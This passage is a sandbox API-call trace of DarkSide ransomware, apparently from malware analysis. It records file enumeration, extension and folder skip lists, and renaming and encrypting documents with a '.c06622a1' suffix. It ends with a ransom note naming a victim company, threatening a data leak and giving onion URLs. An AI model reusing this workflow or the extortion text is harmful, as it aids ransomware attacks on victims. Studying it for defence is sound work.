lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.911] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x1bc8d719 [0148.911] RtlComputeCrc32 (PartialCrc=0xd719, Buffer=0x3feb74, Length=0x80) returned 0x7436a380 [0148.911] RtlComputeCrc32 (PartialCrc=0xa380, Buffer=0x3feb74, Length=0x80) returned 0x1adfd91d [0148.911] RtlComputeCrc32 (PartialCrc=0xd91d, Buffer=0x3feb74, Length=0x80) returned 0xaee6350b [0148.911] RtlComputeCrc32 (PartialCrc=0x350b, Buffer=0x3feb74, Length=0x80) returned 0xcb726c02 [0148.911] CloseHandle (hObject=0x638) returned 1 [0148.911] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.911] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FD9PK85B_zpq.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FD9PK85B_zpq.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FD9PK85B_zpq.xlsx" [0148.911] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FD9PK85B_zpq.xlsx") returned 0x3d [0148.911] wcscpy (in: _Dest=0x44e00fa, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.911] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FD9PK85B_zpq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fd9pk85b_zpq.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FD9PK85B_zpq.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fd9pk85b_zpq.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0148.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FD9PK85B_zpq.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fd9pk85b_zpq.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x638 [0148.913] CreateIoCompletionPort (FileHandle=0x638, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.914] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x49d0020 [0148.919] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7847a4ae [0148.919] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x41dc83d7 [0148.919] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x77abeada [0148.919] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xb0108a8 [0148.919] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xb60129c [0148.919] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x17c6da68 [0148.919] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x71b6253f [0148.919] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x33e884ca [0148.922] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x49d0094, Length=0x80) returned 0x9c750155 [0148.922] RtlComputeCrc32 (PartialCrc=0x155, Buffer=0x49d0094, Length=0x80) returned 0x88dc24be [0148.922] RtlComputeCrc32 (PartialCrc=0x24be, Buffer=0x49d0094, Length=0x80) returned 0x441f8f6e [0148.922] RtlComputeCrc32 (PartialCrc=0x8f6e, Buffer=0x49d0094, Length=0x80) returned 0xc3fb387a [0148.922] RtlComputeCrc32 (PartialCrc=0x387a, Buffer=0x49d0094, Length=0x80) returned 0xfdc8507b [0148.922] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0148.922] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.923] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.923] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcced980, ftCreationTime.dwHighDateTime=0x1d5d4a6, ftLastAccessTime.dwLowDateTime=0xe2623670, ftLastAccessTime.dwHighDateTime=0x1d5beab, ftLastWriteTime.dwLowDateTime=0xe2623670, ftLastWriteTime.dwHighDateTime=0x1d5beab, nFileSizeHigh=0x0, nFileSizeLow=0x13fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE1bmdttHCskZ2U8.pptx", cAlternateFileName="IE1BMD~1.PPT")) returned 1 [0148.923] _wcsicmp (_Str1="IE1bmdttHCskZ2U8.pptx", _Str2="README.c06622a1.TXT") returned -9 [0148.923] wcsstr (_Str="IE1bmdttHCskZ2U8.pptx", _SubStr="README") returned 0x0 [0148.923] _wcsicmp (_Str1="autorun.inf", _Str2="IE1bmdttHCskZ2U8.pptx") returned -8 [0148.923] wcslen (_String="autorun.inf") returned 0xb [0148.923] _wcsicmp (_Str1="boot.ini", _Str2="IE1bmdttHCskZ2U8.pptx") returned -7 [0148.923] wcslen (_String="boot.ini") returned 0x8 [0148.923] _wcsicmp (_Str1="bootfont.bin", _Str2="IE1bmdttHCskZ2U8.pptx") returned -7 [0148.923] wcslen (_String="bootfont.bin") returned 0xc [0148.923] _wcsicmp (_Str1="bootsect.bak", _Str2="IE1bmdttHCskZ2U8.pptx") returned -7 [0148.923] wcslen (_String="bootsect.bak") returned 0xc [0148.923] _wcsicmp (_Str1="desktop.ini", _Str2="IE1bmdttHCskZ2U8.pptx") returned -5 [0148.923] wcslen (_String="desktop.ini") returned 0xb [0148.923] _wcsicmp (_Str1="iconcache.db", _Str2="IE1bmdttHCskZ2U8.pptx") returned -2 [0148.923] wcslen (_String="iconcache.db") returned 0xc [0148.923] _wcsicmp (_Str1="ntldr", _Str2="IE1bmdttHCskZ2U8.pptx") returned 5 [0148.923] wcslen (_String="ntldr") returned 0x5 [0148.923] _wcsicmp (_Str1="ntuser.dat", _Str2="IE1bmdttHCskZ2U8.pptx") returned 5 [0148.923] wcslen (_String="ntuser.dat") returned 0xa [0148.923] _wcsicmp (_Str1="ntuser.dat.log", _Str2="IE1bmdttHCskZ2U8.pptx") returned 5 [0148.923] wcslen (_String="ntuser.dat.log") returned 0xe [0148.923] _wcsicmp (_Str1="ntuser.ini", _Str2="IE1bmdttHCskZ2U8.pptx") returned 5 [0148.923] wcslen (_String="ntuser.ini") returned 0xa [0148.923] _wcsicmp (_Str1="thumbs.db", _Str2="IE1bmdttHCskZ2U8.pptx") returned 11 [0148.923] wcslen (_String="thumbs.db") returned 0x9 [0148.923] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0148.923] wcslen (_String="386") returned 0x3 [0148.923] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0148.923] wcslen (_String="adv") returned 0x3 [0148.923] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0148.923] wcslen (_String="ani") returned 0x3 [0148.923] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0148.923] wcslen (_String="bat") returned 0x3 [0148.924] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0148.924] wcslen (_String="bin") returned 0x3 [0148.924] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0148.924] wcslen (_String="cab") returned 0x3 [0148.924] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0148.924] wcslen (_String="cmd") returned 0x3 [0148.924] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0148.924] wcslen (_String="com") returned 0x3 [0148.924] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0148.924] wcslen (_String="cpl") returned 0x3 [0148.924] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0148.924] wcslen (_String="cur") returned 0x3 [0148.924] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0148.924] wcslen (_String="deskthemepack") returned 0xd [0148.924] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0148.924] wcslen (_String="diagcab") returned 0x7 [0148.924] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0148.924] wcslen (_String="diagcfg") returned 0x7 [0148.924] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0148.924] wcslen (_String="diagpkg") returned 0x7 [0148.924] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0148.924] wcslen (_String="dll") returned 0x3 [0148.924] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0148.924] wcslen (_String="drv") returned 0x3 [0148.924] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0148.924] wcslen (_String="exe") returned 0x3 [0148.924] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0148.924] wcslen (_String="hlp") returned 0x3 [0148.924] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0148.924] wcslen (_String="icl") returned 0x3 [0148.924] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0148.924] wcslen (_String="icns") returned 0x4 [0148.924] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0148.924] wcslen (_String="ico") returned 0x3 [0148.924] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0148.924] wcslen (_String="ics") returned 0x3 [0148.924] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0148.925] wcslen (_String="idx") returned 0x3 [0148.925] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0148.925] wcslen (_String="ldf") returned 0x3 [0148.925] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0148.925] wcslen (_String="lnk") returned 0x3 [0148.925] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0148.925] wcslen (_String="mod") returned 0x3 [0148.925] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0148.925] wcslen (_String="mpa") returned 0x3 [0148.925] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0148.925] wcslen (_String="msc") returned 0x3 [0148.925] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0148.925] wcslen (_String="msp") returned 0x3 [0148.925] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0148.925] wcslen (_String="msstyles") returned 0x8 [0148.925] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0148.925] wcslen (_String="msu") returned 0x3 [0148.925] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0148.925] wcslen (_String="nls") returned 0x3 [0148.925] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0148.925] wcslen (_String="nomedia") returned 0x7 [0148.925] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0148.925] wcslen (_String="ocx") returned 0x3 [0148.925] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0148.925] wcslen (_String="prf") returned 0x3 [0148.925] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0148.925] wcslen (_String="ps1") returned 0x3 [0148.925] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0148.925] wcslen (_String="rom") returned 0x3 [0148.925] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0148.925] wcslen (_String="rtp") returned 0x3 [0148.925] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0148.925] wcslen (_String="scr") returned 0x3 [0148.925] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0148.925] wcslen (_String="shs") returned 0x3 [0148.925] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0148.925] wcslen (_String="spl") returned 0x3 [0148.925] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0148.926] wcslen (_String="sys") returned 0x3 [0148.926] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0148.926] wcslen (_String="theme") returned 0x5 [0148.926] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0148.926] wcslen (_String="themepack") returned 0x9 [0148.926] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0148.926] wcslen (_String="wpx") returned 0x3 [0148.926] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0148.926] wcslen (_String="lock") returned 0x4 [0148.926] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0148.926] wcslen (_String="key") returned 0x3 [0148.926] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0148.926] wcslen (_String="hta") returned 0x3 [0148.926] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0148.926] wcslen (_String="msi") returned 0x3 [0148.926] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0148.926] wcslen (_String="pdb") returned 0x3 [0148.926] _wcsicmp (_Str1="sql", _Str2="pptx") returned 3 [0148.926] wcslen (_String="sql") returned 0x3 [0148.926] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0148.926] wcslen (_String="sqlite") returned 0x6 [0148.926] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0148.926] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.926] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0148.926] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0148.926] wcscpy (in: _Dest=0x44d00d0, _Source="IE1bmdttHCskZ2U8.pptx" | out: _Dest="IE1bmdttHCskZ2U8.pptx") returned="IE1bmdttHCskZ2U8.pptx" [0148.926] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE1bmdttHCskZ2U8.pptx", dwFileAttributes=0x80) returned 1 [0148.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE1bmdttHCskZ2U8.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ie1bmdtthcskz2u8.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x634 [0148.927] SetFilePointerEx (in: hFile=0x634, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.927] ReadFile (in: hFile=0x634, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.927] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x3e86401c [0148.927] RtlComputeCrc32 (PartialCrc=0x401c, Buffer=0x3feb74, Length=0x80) returned 0x858d8e7e [0148.927] RtlComputeCrc32 (PartialCrc=0x8e7e, Buffer=0x3feb74, Length=0x80) returned 0x323087fb [0148.927] RtlComputeCrc32 (PartialCrc=0x87fb, Buffer=0x3feb74, Length=0x80) returned 0xc59a4ec7 [0148.928] RtlComputeCrc32 (PartialCrc=0x4ec7, Buffer=0x3feb74, Length=0x80) returned 0xcf7f9779 [0148.928] CloseHandle (hObject=0x634) returned 1 [0148.928] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.928] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE1bmdttHCskZ2U8.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE1bmdttHCskZ2U8.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE1bmdttHCskZ2U8.pptx" [0148.928] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE1bmdttHCskZ2U8.pptx") returned 0x41 [0148.928] wcscpy (in: _Dest=0x44e0102, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.928] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE1bmdttHCskZ2U8.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ie1bmdtthcskz2u8.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE1bmdttHCskZ2U8.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ie1bmdtthcskz2u8.pptx.c06622a1"), dwFlags=0x8) returned 1 [0148.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE1bmdttHCskZ2U8.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ie1bmdtthcskz2u8.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x634 [0148.930] CreateIoCompletionPort (FileHandle=0x634, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.930] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4a60020 [0148.935] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2108bb82 [0148.935] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x51cb89cb [0148.935] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x891bcee [0148.935] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x46dc9e4 [0148.935] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x754d16a4 [0148.935] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3c9b438e [0148.935] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4447d4a [0148.935] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x423f8720 [0148.938] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4a60094, Length=0x80) returned 0x47b9d2d9 [0148.938] RtlComputeCrc32 (PartialCrc=0xd2d9, Buffer=0x4a60094, Length=0x80) returned 0xc315e879 [0148.939] RtlComputeCrc32 (PartialCrc=0xe879, Buffer=0x4a60094, Length=0x80) returned 0xfd86c45a [0148.939] RtlComputeCrc32 (PartialCrc=0xc45a, Buffer=0x4a60094, Length=0x80) returned 0x7a262cec [0148.939] RtlComputeCrc32 (PartialCrc=0x2cec, Buffer=0x4a60094, Length=0x80) returned 0xe170329a [0148.939] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0148.939] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.939] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.939] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0148.939] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0148.939] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0148.939] _wcsicmp (_Str1="$recycle.bin", _Str2="My Shapes") returned -73 [0148.939] wcslen (_String="$recycle.bin") returned 0xc [0148.939] _wcsicmp (_Str1="config.msi", _Str2="My Shapes") returned -10 [0148.939] wcslen (_String="config.msi") returned 0xa [0148.939] _wcsicmp (_Str1="$windows.~bt", _Str2="My Shapes") returned -73 [0148.939] wcslen (_String="$windows.~bt") returned 0xc [0148.939] _wcsicmp (_Str1="$windows.~ws", _Str2="My Shapes") returned -73 [0148.939] wcslen (_String="$windows.~ws") returned 0xc [0148.939] _wcsicmp (_Str1="windows", _Str2="My Shapes") returned 10 [0148.939] wcslen (_String="windows") returned 0x7 [0148.939] _wcsicmp (_Str1="appdata", _Str2="My Shapes") returned -12 [0148.939] wcslen (_String="appdata") returned 0x7 [0148.939] _wcsicmp (_Str1="application data", _Str2="My Shapes") returned -12 [0148.939] wcslen (_String="application data") returned 0x10 [0148.939] _wcsicmp (_Str1="boot", _Str2="My Shapes") returned -11 [0148.939] wcslen (_String="boot") returned 0x4 [0148.939] _wcsicmp (_Str1="google", _Str2="My Shapes") returned -6 [0148.939] wcslen (_String="google") returned 0x6 [0148.939] _wcsicmp (_Str1="mozilla", _Str2="My Shapes") returned -10 [0148.939] wcslen (_String="mozilla") returned 0x7 [0148.939] _wcsicmp (_Str1="program files", _Str2="My Shapes") returned 3 [0148.939] wcslen (_String="program files") returned 0xd [0148.939] _wcsicmp (_Str1="program files (x86)", _Str2="My Shapes") returned 3 [0148.939] wcslen (_String="program files (x86)") returned 0x13 [0148.939] _wcsicmp (_Str1="programdata", _Str2="My Shapes") returned 3 [0148.940] wcslen (_String="programdata") returned 0xb [0148.940] _wcsicmp (_Str1="system volume information", _Str2="My Shapes") returned 6 [0148.940] wcslen (_String="system volume information") returned 0x19 [0148.940] _wcsicmp (_Str1="tor browser", _Str2="My Shapes") returned 7 [0148.940] wcslen (_String="tor browser") returned 0xb [0148.940] _wcsicmp (_Str1="windows.old", _Str2="My Shapes") returned 10 [0148.940] wcslen (_String="windows.old") returned 0xb [0148.940] _wcsicmp (_Str1="intel", _Str2="My Shapes") returned -4 [0148.940] wcslen (_String="intel") returned 0x5 [0148.940] _wcsicmp (_Str1="msocache", _Str2="My Shapes") returned -6 [0148.940] wcslen (_String="msocache") returned 0x8 [0148.940] _wcsicmp (_Str1="perflogs", _Str2="My Shapes") returned 3 [0148.940] wcslen (_String="perflogs") returned 0x8 [0148.940] _wcsicmp (_Str1="x64dbg", _Str2="My Shapes") returned 11 [0148.940] wcslen (_String="x64dbg") returned 0x6 [0148.940] _wcsicmp (_Str1="public", _Str2="My Shapes") returned 3 [0148.940] wcslen (_String="public") returned 0x6 [0148.940] _wcsicmp (_Str1="all users", _Str2="My Shapes") returned -12 [0148.940] wcslen (_String="all users") returned 0x9 [0148.940] _wcsicmp (_Str1="default", _Str2="My Shapes") returned -9 [0148.940] wcslen (_String="default") returned 0x7 [0148.940] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" [0148.940] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned 0x2d [0148.940] wcscpy (in: _Dest=0x44b00c0, _Source="My Shapes" | out: _Dest="My Shapes") returned="My Shapes" [0148.940] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.940] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.940] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0148.940] GetNamedSecurityInfoW () returned 0x0 [0148.941] SetEntriesInAclW () returned 0x0 [0148.941] SetNamedSecurityInfoW () returned 0x0 [0148.944] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57478) returned 1 [0148.944] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0148.944] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes")) returned 1 [0148.944] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 